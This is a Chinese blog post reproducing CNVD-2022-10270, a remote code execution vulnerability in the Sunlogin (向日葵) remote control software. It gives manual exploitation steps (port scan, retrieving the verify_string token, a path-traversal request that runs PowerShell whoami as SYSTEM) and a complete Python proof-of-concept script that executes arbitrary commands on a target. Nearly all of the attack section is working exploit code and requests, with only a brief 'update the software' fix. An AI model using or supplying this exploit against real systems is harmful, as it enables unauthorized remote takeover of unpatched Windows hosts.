首页 > 其他分享 >复现CVE-2022-10270(向日葵远程代码执行漏洞)

复现CVE-2022-10270(向日葵远程代码执行漏洞)

时间:2022-08-19 15:13:41浏览次数:116  
标签:.. 10270 ..% headers 2F 向日葵 代码执行 2022 漏洞

警告

请勿使用本文提到的内容违反法律。
本文不提供任何担保。

漏洞描述

     向日葵是一款免费的,集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。CNVD披露了Oray旗下向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270 / CNVD-2022-03672),影响Windows系统中的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。目前已发现有漏洞利用演示视频公开,请相关用户尽快采取措施进行防护。

CNVD-2022-10270

影响版本

向日葵个人版for Windows <= 11.0.0.33
向日葵简约版 <= V1.0.1.43315(2021.12)

漏洞复现

一、手工复现

1、端口扫描

nmap对目标主机进行全端口扫描:nmap -sS -p- 192.168.200.135

由于nmap的全端口扫描很慢(没使用多线程),作者自己写了个端口扫描,扫描结果如下:

2、确定向日葵的可疑端口

 经过查阅发现,该版本的向日葵开启了不常用的端口(40000-50000)之间,根据这一解释,不难发现扫描结果中的 192.168.200.135:49678 的可疑存在。

浏览器访问:curl 192.168.200.135:49678
抓包得到:{"success":false,"msg":"Verification failure"}

 3、获取验证码

访问地址:http://192.168.200.135:49678/cgi-bin/rpc?action=verify-haras
抓包得到:{"__code":0,"enabled":"1","verify_string":"9VIoJqZNnRo0eCnhJ6xg7U4j0uU16YRP","code":0}

 验证码为:9VIoJqZNnRo0eCnhJ6xg7U4j0uU16YRP

4、构造 payload 并发送请求

访问地址:http://192.168.200.135:49678/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami
加上cookie:CID=9VIoJqZNnRo0eCnhJ6xg7U4j0uU16YRP
抓包得到:nt authority\syste

二、脚本复现

import requests,sys
 
ip = sys.argv[1]
command = sys.argv[2]
payload1 = "/cgi-bin/rpc?action=verify-haras"
payload2 = "/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+"
headers = {
    'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0'
}
 
if "http://" not in ip:
    host = "http://" + ip
else:
    host = ip
 
try:
    s = requests.Session()
    res = s.get(url=host + payload1,headers=headers)
    if res.status_code == 200:
        res = res.json()
        Cid = res['verify_string']
        headers.update({'Cookie':"CID=" + Cid})
        res1 = s.get(url=host + payload2 + command,headers=headers)
        res1.encoding = "GBK"
        print(res1.text)
    else:
        pass
except Exception as e:
    print(e)

使用方法:python3 sunrce.py 目标ip:端口 "命令"

作者重写了该poc,运行效果如下图:

 

 

 修复建议

更新向日葵版本

标签:..,10270,..%,headers,2F,向日葵,代码执行,2022,漏洞
From: https://www.cnblogs.com/spmonkey/p/16602040.html

相关文章

  • 2022-8-19 剑指offer-二叉树-递归
    剑指OfferII055.二叉搜索树迭代器难度中等30收藏分享切换为英文接收动态反馈实现一个二叉搜索树迭代器类BSTIterator ,表示一个按中序遍历二叉搜索树(BST)的迭代......
  • 2022-08-19 第二小组 张di
    JDBCStatement的不足1.大量的拼接,可读性低 2.sql注入Connectionconn=null;Statementstmt=null;ResultSetre=null;conn=GetCon......
  • 限时免费领取!网易数帆深度参编中国信通院《低代码发展白皮书(2022年)》
    【点击即可免费获取完整版《低代码发展白皮书(2022年)》】近日,由中国信息通信研究院(以下简称“中国信通院”)和中国通信标准化协会联合主办的“2022数字化转型发展高峰论坛”......
  • 2022-08-18 第六小组 高佳誉 学习笔记
    MySQL常用函数聚合函数count:计数。count(*)≈count(1)>count(主键)count(*):MySQL对count(*)底层优化,count(0)。count(1)count(主键)count(字段)min:最小值max:最......
  • JAVA从头学习-2022年8月15日
    总概述1、JAVA是什么是一门高级编程语言2、JAVA是哪家公司研发的,现在属于哪家公司sun,oracle3、Java之父是谁詹姆斯.高斯林......
  • NOI2022 游记
    NOI2022游寄还没开始就感觉自己会寄。2022.8.19这时候才想起来写博客,是不是有点晚了(这几天都在昆山万怡酒店摸鱼,隔两天考一次多校联考,其他学校暴打hsy,其他大佬暴打我Q......
  • 2022-8-17 mysql 第三天
    DQL查询语言子查询按照结果集的行列数不同,子查询可以分为以下几类:标量子查询:结果集只有一行一列(单行子查询)列子查询:结果集有一列多行行子查询:结果集有一行多列表子......
  • 2022-08-18 第六小组 张宁杰 MySQL数据库(3)MySQL常用函数
    MySQL常用函数聚合函数count:计数。count(*)≈count(1)>count(主键)count(*):MySQL对count(*)底层优化,count(0)。count(1)count(主键)count(字段)min:最小值max:最......
  • 2022-08-18 第五组 赖哲栋 学习笔记
    MySQL常用函数聚合函数count:计数count():MySQL对count()底层优化,count(0)count(1)count(主键)count(字段)min:最小值max:最大值sum:求和avg:平均值数值型函数......
  • [游记]暑假集训6-2022
    久违的Rank1A. 接力比赛比较显然的$\operatorname{DP}$,两个$01$背包解决问题  #include<cstdio>#include<cstring>#include<string>#defineWRWinterRa......